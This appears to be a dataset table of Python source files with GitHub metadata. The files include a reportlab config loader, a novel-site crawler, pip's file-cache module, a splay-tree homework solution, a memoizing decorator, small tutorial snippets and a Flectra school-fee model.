| column | type | range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3 to 616 |
| content_id | string | length 40 |
| detected_licenses | sequence | length 0 to 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k to 681M, nullable |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes, nullable |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 to 10.2M |
| extension | string | 188 classes |
| content | string | length 3 to 10.2M |
| authors | sequence | length 1 |
| author_id | string | length 1 to 132 |
03e064a0bce0dd00a223a41938dc5d68dd20b8ce | 6437a3a4a31ab9ad233d6b2d985beb50ed50de23 | /PythonistaAppTemplate/PythonistaKit.framework/pylib/site-packages/reportlab/rl_config.py | 14438fb24175d622317b26fc4539590edf37a674 | [] | no_license | sreyemnayr/jss-lost-mode-app | 03ddc472decde3c17a11294d8ee48b02f83b71e7 | 3ff4ba6fb13f4f3a4a98bfc824eace137f6aabaa | refs/heads/master | 2021-05-02T08:50:10.580091 | 2018-02-08T20:32:29 | 2018-02-08T20:32:29 | 120,813,623 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,725 | py |
#\input texinfo
'''module that aggregates config information'''
__all__=('_reset','register_reset')

def _defaults_init():
    '''
    create & return defaults for all reportlab settings from
    reportlab.rl_settings.py
    reportlab.local_rl_settings.py
    reportlab_settings.py or ~/.reportlab_settings

    latter values override earlier
    '''
    from reportlab.lib.utils import rl_exec
    import os

    _DEFAULTS={}
    rl_exec('from reportlab.rl_settings import *',_DEFAULTS)

    _overrides=_DEFAULTS.copy()
    try:
        rl_exec('from reportlab.local_rl_settings import *',_overrides)
        _DEFAULTS.update(_overrides)
    except ImportError:
        pass

    _overrides=_DEFAULTS.copy()
    try:
        rl_exec('from reportlab_settings import *',_overrides)
        _DEFAULTS.update(_overrides)
    except ImportError:
        _overrides=_DEFAULTS.copy()
        try:
            with open(os.path.expanduser(os.path.join('~','.reportlab_settings')),'rb') as f:
                rl_exec(f.read(),_overrides)
            _DEFAULTS.update(_overrides)
        except:
            pass
    return _DEFAULTS

_DEFAULTS=_defaults_init()

_SAVED = {}
sys_version=None

#this is used to set the options from
def _setOpt(name, value, conv=None):
    '''set a module level value from environ/default'''
    from os import environ
    ename = 'RL_'+name
    if ename in environ:
        value = environ[ename]
        if conv: value = conv(value)
    globals()[name] = value

def _startUp():
    '''This function allows easy resetting to the global defaults
    If the environment contains 'RL_xxx' then we use the value
    else we use the given default'''
    import os, sys
    global sys_version, _unset_
    sys_version = sys.version.split()[0]  #strip off the other garbage
    from reportlab.lib import pagesizes
    from reportlab.lib.utils import rl_isdir
    if _SAVED=={}:
        _unset_ = getattr(sys,'_rl_config__unset_',None)
        if _unset_ is None:
            class _unset_: pass
            sys._rl_config__unset_ = _unset_ = _unset_()
        global __all__
        A = list(__all__)
        for k,v in _DEFAULTS.items():
            _SAVED[k] = globals()[k] = v
            if k not in __all__:
                A.append(k)
        __all__ = tuple(A)

    #places to search for Type 1 Font files
    import reportlab
    D = {'REPORTLAB_DIR': os.path.abspath(os.path.dirname(reportlab.__file__)),
         'CWD': os.getcwd(),
         'disk': os.getcwd().split(':')[0],
         'sys_version': sys_version,
         'XDG_DATA_HOME': os.environ.get('XDG_DATA_HOME','~/.local/share'),
         }

    for k in _SAVED:
        if k.endswith('SearchPath'):
            P=[]
            for p in _SAVED[k]:
                d = (p % D).replace('/',os.sep)
                if '~' in d: d = os.path.expanduser(d)
                if rl_isdir(d): P.append(d)
            _setOpt(k,os.pathsep.join(P),lambda x:x.split(os.pathsep))
            globals()[k] = list(filter(rl_isdir,globals()[k]))
        else:
            v = _SAVED[k]
            if isinstance(v,(int,float)): conv = type(v)
            elif k=='defaultPageSize': conv = lambda v,M=pagesizes: getattr(M,v)
            else: conv = None
            _setOpt(k,v,conv)

_registered_resets=[]
def register_reset(func):
    '''register a function to be called by rl_config._reset'''
    _registered_resets[:] = [x for x in _registered_resets if x()]
    L = [x for x in _registered_resets if x() is func]
    if L: return
    from weakref import ref
    _registered_resets.append(ref(func))

def _reset():
    '''attempt to reset reportlab and friends'''
    _startUp()  #our reset
    for f in _registered_resets[:]:
        c = f()
        if c:
            c()
        else:
            _registered_resets.remove(f)

_startUp()
| [ "[email protected]" ] | |
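# Added illustration: after the _startUp() call above, the merged settings are
# exposed as plain module globals on reportlab.rl_config. defaultPageSize and
# shapeChecking are real settings from reportlab's documentation, but the exact
# attribute set is version-dependent, so treat this as a sketch:
#
#   from reportlab import rl_config
#   print(rl_config.defaultPageSize)   # page size resolved from rl_settings
#   rl_config.shapeChecking = 0        # e.g. disable shape checking for speed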
0587480993283923fc28a800af3f56fc5d43a1d5 | 34e3147447875b491bd1b50c915f8848ead80792 | /uncertainty/constants.py | f19f8cdc91913b47521873fbed92985edbf59ce3 | [ "MIT" ] | permissive | meyersbs/uncertainty | 680f275ded6aad63012a7ca781d1cf455c66f226 | c12842cda7bea2d604bb9227a6c0baba9830b6fe | refs/heads/master | 2023-07-20T09:00:25.876780 | 2023-07-07T18:17:07 | 2023-07-07T18:17:07 | 87,837,406 | 19 | 5 | MIT | 2023-07-07T18:17:09 | 2017-04-10T17:16:51 | Python | UTF-8 | Python | false | false | 510 | py |
from pkg_resources import resource_filename
BCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/bclass.p')
MCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/mclass.p')
VECTORIZER_PATH = resource_filename('uncertainty', 'vectorizers/vectorizer.p')
UNCERTAINTY_CLASS_MAP = {
    'speculation_modal_probable_': 'E',
    'speculation_hypo_doxastic _': 'D',
    'speculation_hypo_condition _': 'N',
    'speculation_hypo_investigation _': 'I',
    'O': 'C'
}
| [ "[email protected]" ] | |
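# Added sketch, assuming the .p files are pickled classifier/vectorizer objects
# as the constant names suggest (not confirmed by this file alone):
#
#   import pickle
#   with open(BCLASS_CLASSIFIER_PATH, 'rb') as f:
#       bclass = pickle.load(f)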
5865cee0434fa771b0ffd1e3c9bcb56df6e08c4a | 3967e42abb6f497ede6d342e8f74bd8150f9c52d | /src/spiders/qidiancom.py | b70dc6414c2c1f6637e2011d657997aa17ae923f | [ "Apache-2.0" ] | permissive | varunprashar5/lightnovel-crawler | 4886862115c5c3e15a9137e698e14253e14b7423 | 4ca387f3c8f17771befad1d48d417bbc7b9f8bfd | refs/heads/master | 2020-12-01T22:27:33.699798 | 2019-12-29T05:25:09 | 2019-12-29T05:25:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,465 | py |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from ..utils.crawler import Crawler
logger = logging.getLogger('QIDIAN_COM')
chapter_list_url = 'https://book.qidian.com/ajax/book/category?_csrfToken=%s&bookId=%s'
chapter_details_url = 'https://read.qidian.com/chapter/%s'
class QidianComCrawler(Crawler):
    def initialize(self):
        self.home_url = 'https://www.qidian.com/'
    # end def

    def read_novel_info(self):
        '''Get novel title, author, cover etc'''
        logger.debug('Visiting %s', self.novel_url)
        soup = self.get_soup(self.novel_url)

        self.novel_title = soup.select_one('.book-info h1 em').text
        logger.info('Novel title: %s', self.novel_title)

        self.novel_author = soup.select_one('.book-info h1 a.writer').text
        logger.info('Novel author: %s', self.novel_author)

        book_img = soup.select_one('#bookImg')
        self.novel_cover = self.absolute_url(book_img.find('img')['src'])
        self.novel_cover = '/'.join(self.novel_cover.split('/')[:-1])
        logger.info('Novel cover: %s', self.novel_cover)

        self.book_id = book_img['data-bid']
        logger.debug('Book Id: %s', self.book_id)

        self.csrf = self.cookies['_csrfToken']
        logger.debug('CSRF Token: %s', self.csrf)

        volume_url = chapter_list_url % (self.csrf, self.book_id)
        logger.debug('Visiting %s', volume_url)
        data = self.get_json(volume_url)

        for volume in data['data']['vs']:
            vol_id = len(self.volumes) + 1
            self.volumes.append({
                'id': vol_id,
                'title': volume['vN'],
            })
            for chapter in volume['cs']:
                ch_id = len(self.chapters) + 1
                self.chapters.append({
                    'id': ch_id,
                    'volume': vol_id,
                    'title': chapter['cN'],
                    'url': chapter_details_url % chapter['cU'],
                })
            # end for
        # end for
    # end def

    def download_chapter_body(self, chapter):
        '''Download body of a single chapter and return as clean html format'''
        logger.info('Downloading %s', chapter['url'])
        soup = self.get_soup(chapter['url'])
        chapter['body_lock'] = True
        chapter['title'] = soup.select_one('h3.j_chapterName').text.strip()
        return soup.select_one('div.j_readContent').extract()
    # end def
# end class
| [ "[email protected]" ] | |
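# Added usage sketch. The Crawler base class belongs to the surrounding
# lightnovel-crawler app, so the driver code below is an assumption; it only
# calls attributes and methods that appear in this spider:
#
#   crawler = QidianComCrawler()
#   crawler.novel_url = 'https://book.qidian.com/info/0000000000'  # hypothetical URL
#   crawler.initialize()
#   crawler.read_novel_info()
#   print(crawler.novel_title, len(crawler.chapters))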
8e7ea66678d6525ed22d3dd5952486d8e44cd520 | 6923f79f1eaaba0ab28b25337ba6cb56be97d32d | /Fluid_Engine_Development_Doyub_Kim/external/src/pystring/SConscript | b6e8c9660762838555a40f518621f6873e7cf39a | [ "MIT" ] | permissive | burakbayramli/books | 9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0 | 5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95 | refs/heads/master | 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 | Jupyter Notebook | UTF-8 | Python | false | false | 320 | |
"""
Copyright (c) 2016 Doyub Kim
"""
Import('env', 'os', 'utils')
script_dir = os.path.dirname(File('SConscript').rfile().abspath)
lib_env = env.Clone()
lib_env.Append(CPPPATH = [os.path.join(script_dir, 'pystring'), script_dir])
lib = lib_env.Library('pystring', 'pystring/pystring.cpp')
Return('lib_env', 'lib')
| [ "[email protected]" ] | |
1d443fcd8a68dc9c0124dcbff16c16d020b695ab | 9e549ee54faa8b037f90eac8ecb36f853e460e5e | /venv/lib/python3.6/site-packages/pip/_vendor/cachecontrol/caches/file_cache.py | 10f2f222d46d9d3c3a69f254940903cb2be1c86b | [ "MIT" ] | permissive | aitoehigie/britecore_flask | e8df68e71dd0eac980a7de8c0f20b5a5a16979fe | eef1873dbe6b2cc21f770bc6dec783007ae4493b | refs/heads/master | 2022-12-09T22:07:45.930238 | 2019-05-15T04:10:37 | 2019-05-15T04:10:37 | 177,354,667 | 0 | 0 | MIT | 2022-12-08T04:54:09 | 2019-03-24T00:38:20 | Python | UTF-8 | Python | false | false | 4,176 | py |
import hashlib
import os
from textwrap import dedent
from ..cache import BaseCache
from ..controller import CacheController
try:
    FileNotFoundError
except NameError:
    # py2.X
    FileNotFoundError = (IOError, OSError)


def _secure_open_write(filename, fmode):
    # We only want to write to this file, so open it in write only mode
    flags = os.O_WRONLY

    # os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
    # will open *new* files.
    # We specify this because we want to ensure that the mode we pass is the
    # mode of the file.
    flags |= os.O_CREAT | os.O_EXCL

    # Do not follow symlinks to prevent someone from making a symlink that
    # we follow and insecurely open a cache file.
    if hasattr(os, "O_NOFOLLOW"):
        flags |= os.O_NOFOLLOW

    # On Windows we'll mark this file as binary
    if hasattr(os, "O_BINARY"):
        flags |= os.O_BINARY

    # Before we open our file, we want to delete any existing file that is
    # there
    try:
        os.remove(filename)
    except (IOError, OSError):
        # The file must not exist already, so we can just skip ahead to opening
        pass

    # Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a
    # race condition happens between the os.remove and this line, that an
    # error will be raised. Because we utilize a lockfile this should only
    # happen if someone is attempting to attack us.
    fd = os.open(filename, flags, fmode)
    try:
        return os.fdopen(fd, "wb")

    except:
        # An error occurred wrapping our FD in a file object
        os.close(fd)
        raise


class FileCache(BaseCache):

    def __init__(
        self,
        directory,
        forever=False,
        filemode=0o0600,
        dirmode=0o0700,
        use_dir_lock=None,
        lock_class=None,
    ):

        if use_dir_lock is not None and lock_class is not None:
            raise ValueError("Cannot use use_dir_lock and lock_class together")

        try:
            from pip._vendor.lockfile import LockFile
            from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile
        except ImportError:
            notice = dedent(
                """
            NOTE: In order to use the FileCache you must have
            lockfile installed. You can install it via pip:
              pip install lockfile
            """
            )
            raise ImportError(notice)

        else:
            if use_dir_lock:
                lock_class = MkdirLockFile

            elif lock_class is None:
                lock_class = LockFile

        self.directory = directory
        self.forever = forever
        self.filemode = filemode
        self.dirmode = dirmode
        self.lock_class = lock_class

    @staticmethod
    def encode(x):
        return hashlib.sha224(x.encode()).hexdigest()

    def _fn(self, name):
        # NOTE: This method should not change as some may depend on it.
        # See: https://github.com/ionrock/cachecontrol/issues/63
        hashed = self.encode(name)
        parts = list(hashed[:5]) + [hashed]
        return os.path.join(self.directory, *parts)

    def get(self, key):
        name = self._fn(key)
        try:
            with open(name, "rb") as fh:
                return fh.read()

        except FileNotFoundError:
            return None

    def set(self, key, value):
        name = self._fn(key)

        # Make sure the directory exists
        try:
            os.makedirs(os.path.dirname(name), self.dirmode)
        except (IOError, OSError):
            pass

        with self.lock_class(name) as lock:
            # Write our actual file
            with _secure_open_write(lock.path, self.filemode) as fh:
                fh.write(value)

    def delete(self, key):
        name = self._fn(key)
        if not self.forever:
            try:
                os.remove(name)
            except FileNotFoundError:
                pass


def url_to_file_path(url, filecache):
    """Return the file cache path based on the URL.

    This does not ensure the file exists!
    """
    key = CacheController.cache_url(url)
    return filecache._fn(key)
| [ "[email protected]" ] | |
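# Added usage sketch: FileCache is designed to plug into cachecontrol's wrapper
# around requests (API names per cachecontrol's documentation; verify against
# the vendored version shipped with pip):
#
#   import requests
#   from cachecontrol import CacheControl
#   from cachecontrol.caches.file_cache import FileCache
#   sess = CacheControl(requests.Session(), cache=FileCache('.web_cache'))
#   sess.get('https://example.com/')   # repeat requests can be served from disk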
6757f60ad54e92de598316caec907e610dd16c53 | e01c5d1ee81cc4104b248be375e93ae29c4b3572 | /Sequence4/DS/Week5/submission/sub-range-4.py | 585c33c2a3133ca7749fcb1568e035d6b909e7e3 | [] | no_license | lalitzz/DS | 7de54281a34814601f26ee826c722d123ee8bd99 | 66272a7a8c20c0c3e85aa5f9d19f29e0a3e11db1 | refs/heads/master | 2021-10-14T09:47:08.754570 | 2018-12-29T11:00:25 | 2018-12-29T11:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,351 | py |
# python3
from sys import stdin
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
# Splay tree implementation
# Vertex of a splay tree
class Vertex:
    def __init__(self, key, sum, left, right, parent):
        (self.key, self.sum, self.left, self.right, self.parent) = (key, sum, left, right, parent)


class SplayTree:
    def update(self, v):
        if v == None:
            return
        v.sum = v.key + (v.left.sum if v.left != None else 0) + (v.right.sum if v.right != None else 0)
        if v.left != None:
            v.left.parent = v
        if v.right != None:
            v.right.parent = v

    def smallRotation(self, v):
        parent = v.parent
        if parent == None:
            return
        grandparent = v.parent.parent
        if parent.left == v:
            m = v.right
            v.right = parent
            parent.left = m
        else:
            m = v.left
            v.left = parent
            parent.right = m
        self.update(parent)
        self.update(v)
        v.parent = grandparent
        if grandparent != None:
            if grandparent.left == parent:
                grandparent.left = v
            else:
                grandparent.right = v

    def bigRotation(self, v):
        if v.parent.left == v and v.parent.parent.left == v.parent:
            # Zig-zig
            self.smallRotation(v.parent)
            self.smallRotation(v)
        elif v.parent.right == v and v.parent.parent.right == v.parent:
            # Zig-zig
            self.smallRotation(v.parent)
            self.smallRotation(v)
        else:
            # Zig-zag
            self.smallRotation(v)
            self.smallRotation(v)

    # Makes splay of the given vertex and makes
    # it the new root.
    def splay(self, v):
        if v == None:
            return None
        while v.parent != None:
            if v.parent.parent == None:
                self.smallRotation(v)
                break
            self.bigRotation(v)
        return v

    # Searches for the given key in the tree with the given root
    # and calls splay for the deepest visited node after that.
    # Returns pair of the result and the new root.
    # If found, result is a pointer to the node with the given key.
    # Otherwise, result is a pointer to the node with the smallest
    # bigger key (next value in the order).
    # If the key is bigger than all keys in the tree,
    # then result is None.
    def find(self, root, key):
        v = root
        last = root
        next = None
        while v != None:
            if v.key >= key and (next == None or v.key < next.key):
                next = v
            last = v
            if v.key == key:
                break
            if v.key < key:
                v = v.right
            else:
                v = v.left
        root = self.splay(last)
        return (next, root)

    def split(self, root, key):
        (result, root) = self.find(root, key)
        if result == None:
            return (root, None)
        right = self.splay(result)
        left = right.left
        right.left = None
        if left != None:
            left.parent = None
        self.update(left)
        self.update(right)
        return (left, right)

    def merge(self, left, right):
        if left == None:
            return right
        if right == None:
            return left
        while right.left != None:
            right = right.left
        right = self.splay(right)
        right.left = left
        self.update(right)
        return right


class SetRange:
    # Code that uses splay tree to solve the problem
    root = None
    S = SplayTree()

    def insert(self, x):
        (left, right) = self.S.split(self.root, x)
        new_vertex = None
        if right == None or right.key != x:
            new_vertex = Vertex(x, x, None, None, None)
        self.root = self.S.merge(self.S.merge(left, new_vertex), right)

    def erase(self, x):
        if self.search(x) is None:
            return
        self.S.splay(self.root)
        self.root = self.S.merge(self.root.left, self.root.right)
        if self.root is not None:
            self.root.parent = None

    def search(self, x):
        # Implement find yourself
        result, self.root = self.S.find(self.root, x)
        if result is None or self.root.key != x:
            return None
        return result.key

    def sum(self, fr, to):
        (left, middle) = self.S.split(self.root, fr)
        (middle, right) = self.S.split(middle, to + 1)
        ans = 0
        # Complete the implementation of sum
        if middle is None:
            ans = 0
            self.root = self.S.merge(left, right)
        else:
            ans = middle.sum
            self.root = self.S.merge(self.S.merge(left, middle), right)
        return ans

    def get_tree(self):
        print(self.root.key)
        self._get_tree(self.root)

    def _get_tree(self, root):
        if root:
            self._get_tree(root.left)
            print(root.key)
            self._get_tree(root.right)


def main():
    MODULO = 1000000001
    n = int(stdin.readline())
    last_sum_result = 0
    s = SetRange()
    for i in range(n):
        line = stdin.readline().split()
        if line[0] == '+':
            x = int(line[1])
            s.insert((x + last_sum_result) % MODULO)
        elif line[0] == '-':
            x = int(line[1])
            s.erase((x + last_sum_result) % MODULO)
        elif line[0] == '?':
            x = int(line[1])
            print('Found' if s.search((x + last_sum_result) % MODULO) is not None else 'Not found')
        elif line[0] == 's':
            l = int(line[1])
            r = int(line[2])
            res = s.sum((l + last_sum_result) % MODULO, (r + last_sum_result) % MODULO)
            print(res)
            last_sum_result = res % MODULO
        elif line[0] == 'c':
            s.get_tree()


if __name__ == "__main__":
    main()
| [ "[email protected]" ] | |
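# Added illustration (not from the original submission) of the query protocol
# main() implements: '+' insert, '-' erase, '?' membership, 's' range sum, and
# every later argument is shifted by the last printed sum modulo 1000000001.
#
#   input:          output:
#   3
#   + 1
#   + 2
#   s 1 2           3   (afterwards an argument x is read as (x + 3) % 1000000001)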
871f3e48a561c6d3a0a81e78fb26e52f6fa2eb7c | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2/gavicharla/codejam1.py | 25da9175da664053709c8d25e93ab4bca77cade7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 515 | py |
def flip(s,l):
    str1 = []
    for i in range(l):
        if(s[i] == '-'):
            str1.append('+')
        else:
            str1.append('-')
    return "".join(str1)

test_cases = int(raw_input())
for test in range(test_cases):
    s = raw_input()
    l = len(s)
    count = l
    let = 0
    while ('-' in s):
        let += 1
        last_m = s[:count].rfind("-")
        s = flip(s[:last_m+1],last_m+1)+s[last_m+1:]
        count = s.rfind("+")
    print "case #"+str(test+1)+": "+str(let)
| [ "[[email protected]]" ] | |
f039f11f1012417d425afe36144602e290845663 | dc182e5b4597bdd104d6695c03744a12ebfe2533 | /PythonScripts/cache_decorator.py | 13a86e3faccaa6620f606d3880ecb8559d34a2e1 | [] | no_license | srinaveendesu/Programs | 06fb4a4b452445e4260f9691fe632c732078d54d | f6dbd8db444678b7ae7658126b59b381b3ab0bab | refs/heads/master | 2023-01-27T14:42:40.989127 | 2023-01-18T22:36:14 | 2023-01-18T22:36:14 | 129,948,488 | 1 | 0 | null | 2022-09-13T23:06:04 | 2018-04-17T18:30:13 | Python | UTF-8 | Python | false | false | 404 | py |
import functools  # needed by functools.wraps below (missing in the original snippet)

def cache(func):
"""Keep a cache of previous function calls"""
@functools.wraps(func)
def wrapper_cache(*args, **kwargs):
cache_key = args + tuple(kwargs.items())
if cache_key not in wrapper_cache.cache:
wrapper_cache.cache[cache_key] = func(*args, **kwargs)
return wrapper_cache.cache[cache_key]
wrapper_cache.cache = dict()
    return wrapper_cache
| [ "[email protected]" ] | |
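# Added demo of the decorator (relies on the functools import added above):
#
#   @cache
#   def fib(n):
#       return n if n < 2 else fib(n - 1) + fib(n - 2)
#
#   print(fib(30))    # each fib(k) is computed once, so this is fast
#   print(fib.cache)  # the memo dict, keyed by the call arguments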
4a37455d9a0b65a8c4aec6586528fc1fcda1e472 | 085d3f2f8de5442d69962a65b8acd79478599022 | /2.Dictionaries - the root of Python/Safely finding by key.py | e66f37889bfe6d285916f26ea00f6830005db3ba | [] | no_license | Mat4wrk/Data-Types-for-Data-Science-in-Python-Datacamp | bfe8f8c4d4bc3998ef612f0d3137b15e662209d0 | c2eb30d3c500f69486921d26071a2ef2244e0402 | refs/heads/main | 2023-03-13T10:06:10.748044 | 2021-03-07T14:43:25 | 2021-03-07T14:43:25 | 331,574,648 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py |
# In the DataCamp exercise this snippet comes from, 'names' is a preloaded
# dict mapping rank -> baby name; the sample below is a made-up stand-in so
# the snippet runs on its own:
names = {1: 'Jacob', 2: 'Michael', 3: 'Joshua', 7: 'Daniel'}
# Safely print rank 7 from the names dictionary
print(names.get(7))
# Safely print the type of rank 100 from the names dictionary
print(type(names.get(100)))
# Safely print rank 105 from the names dictionary or 'Not Found'
print(names.get(105, 'Not Found'))
| [ "[email protected]" ] | |
368da12078ad24bb8c1403761b573a5acd4f731c | 2a54e8d6ed124c64abb9e075cc5524bb859ba0fa | /.history/1-Python-Basics/4-bind()-complex_20200412164915.py | 3951d6e1beff4faa4c6fcf2e2f7923a3bcedeff0 | [] | no_license | CaptainStorm21/Python-Foundation | 01b5fbaf7a913506518cf22e0339dd948e65cea1 | a385adeda74f43dd7fb2d99d326b0be23db25024 | refs/heads/master | 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py |
#complex
z = complex(2, -3)
print(z)
z = complex(1)
print(z)
z = complex()
print(z)
z = complex('5-9j')
print(z)
# output
# (2-3j)
# (1+0j)
# 0j
# (5-9j)
#binary
print(bin(5))
# binary output 0b101
#binary with letter b with python
#non-python binary number of 5 is 101
#convert from binary into an integer
print(int('101', 2))  # 5: int() with base 2 converts a binary string back to an integer
| [ "[email protected]" ] | |
782de249b46f09546dcf741a0fc5f71b7f5aca5e | a03303e46f21697c9da87d0bb0f7b0a3077aba5c | /siswa_keu_ocb11/models/biaya_ta_jenjang.py | 8c0710c7ba375eaad0378bdde9362af08f91cdde | [] | no_license | butirpadi/flectra_app_sek | fccd3e47ef261e116478e6da7f0cc544ee67f127 | 00fa36d9176511f8ffe3c7636a8434ee2ed8c756 | refs/heads/master | 2020-04-06T10:26:37.053024 | 2018-11-19T23:59:34 | 2018-11-20T00:17:02 | 157,380,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,290 | py |
# -*- coding: utf-8 -*-
from flectra import models, fields, api, _
from pprint import pprint
from datetime import datetime, date
import calendar
class biaya_ta_jenjang(models.Model):
    _name = 'siswa_keu_ocb11.biaya_ta_jenjang'

    name = fields.Char('Name', related="biaya_id.name")
    tahunajaran_jenjang_id = fields.Many2one('siswa_ocb11.tahunajaran_jenjang', string='Tahun Ajaran', required=True, ondelete='cascade')
    biaya_id = fields.Many2one('siswa_keu_ocb11.biaya', string='Biaya', required=True)
    is_different_by_gender = fields.Boolean('Different by Gender', related='biaya_id.is_different_by_gender')
    harga = fields.Float('Harga', required=True, default=0)
    harga_alt = fields.Float('Harga (Alt)', required=True, default=0)

    def recompute_biaya_ta_jenjang(self):
        print('recompute biaya ta jenjang')
        # get the student data
        rb_sis_ids = self.env['siswa_ocb11.rombel_siswa'].search([
            ('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
            ('jenjang_id', '=', self.tahunajaran_jenjang_id.jenjang_id.id),
        ])
        for sis in rb_sis_ids:
            siswa = sis.siswa_id
            total_biaya = 0
            if sis.siswa_id.active:
                if self.biaya_id.assign_to == 'all' or (siswa.is_siswa_lama and self.biaya_id.assign_to == 'lama') or (not siswa.is_siswa_lama and self.biaya_id.assign_to == 'baru'):
                    # if siswa.is_siswa_lama and self.biaya_id.is_siswa_baru_only:
                    #     print('skip')
                    # else:
                    print('JENJANG ID : ' + str(self.tahunajaran_jenjang_id.jenjang_id.id))
                    if self.biaya_id.is_bulanan:
                        for bulan_index in range(1, 13):
                            harga = self.harga
                            if self.biaya_id.is_different_by_gender:
                                if siswa.jenis_kelamin == 'perempuan':
                                    harga = self.harga_alt
                            self.env['siswa_keu_ocb11.siswa_biaya'].create({
                                'name' : self.biaya_id.name + ' ' + calendar.month_name[bulan_index],
                                'siswa_id' : siswa.id,
                                'tahunajaran_id' : self.tahunajaran_jenjang_id.tahunajaran_id.id,
                                'biaya_id' : self.biaya_id.id,
                                'bulan' : bulan_index,
                                'harga' : harga,
                                'amount_due' : harga,
                                'jenjang_id' : self.tahunajaran_jenjang_id.jenjang_id.id
                            })
                            total_biaya += harga
                    else:
                        harga = self.harga
                        if self.biaya_id.is_different_by_gender:
                            if siswa.jenis_kelamin == 'perempuan':
                                harga = self.harga_alt
                        self.env['siswa_keu_ocb11.siswa_biaya'].create({
                            'name' : self.biaya_id.name,
                            'siswa_id' : siswa.id,
                            'tahunajaran_id' : self.tahunajaran_jenjang_id.tahunajaran_id.id,
                            'biaya_id' : self.biaya_id.id,
                            'harga' : harga,
                            'amount_due' : harga,
                            'jenjang_id' : self.tahunajaran_jenjang_id.jenjang_id.id
                        })
                        total_biaya += harga

            # set total_biaya and amount_due
            # total_biaya = sum(self.harga for by in self.biayas)
            print('ID SISWA : ' + str(siswa.id))
            res_partner_siswa = self.env['res.partner'].search([('id', '=', siswa.id)])
            self.env['res.partner'].search([('id', '=', siswa.id)]).write({
                'total_biaya' : total_biaya,
                'amount_due_biaya' : res_partner_siswa.amount_due_biaya + total_biaya,
            })

        # Recompute the student billing / finance dashboard
        self.recompute_dashboard()

    def reset_biaya_ta_jenjang(self):
        rb_sis_ids = self.env['siswa_ocb11.rombel_siswa'].search([
            ('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
            ('jenjang_id', '=', self.tahunajaran_jenjang_id.jenjang_id.id),
        ])
        for sis in rb_sis_ids:
            siswa = sis.siswa_id
            self.env['siswa_keu_ocb11.siswa_biaya'].search(['&', '&', '&',
                ('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
                ('biaya_id', '=', self.biaya_id.id),
                ('state', '=', 'open'),
                ('siswa_id', '=', siswa.id),
            ]).unlink()

        # Recompute the student billing / finance dashboard
        self.recompute_dashboard()

    def recompute_dashboard(self):
        dash_keuangan_id = self.env['ir.model.data'].search([('name', '=', 'default_dashboard_pembayaran')]).res_id
        dash_keuangan = self.env['siswa_keu_ocb11.keuangan_dashboard'].search([('id', '=', dash_keuangan_id)])
        for dash in dash_keuangan:
            dash.compute_keuangan()
        print('Recompute Keuangan Dashboard done')

    @api.model
    def create(self, vals):
        if not vals['is_different_by_gender']:
            vals['harga_alt'] = vals['harga']
        result = super(biaya_ta_jenjang, self).create(vals)
        return result

    @api.multi
    def write(self, vals):
        self.ensure_one()
        # print('contents: ')
        # pprint(vals)
        # # get biaya
        # # biaya_ta_jenjang = self.env['siswa_keu_ocb11.biaya_ta_jenjang'].search([('id','=',vals['id'])])
        # biaya = self.env['siswa_keu_ocb11.biaya'].search([('id','=',vals['biaya_id'])])
        # if not biaya[0].is_different_by_gender: #vals['is_different_by_gender']:
        if not self.biaya_id.is_different_by_gender:
            if 'harga' in vals:
                vals['harga_alt'] = vals['harga']
        res = super(biaya_ta_jenjang, self).write(vals)
        return res
| [ "[email protected]" ] | |
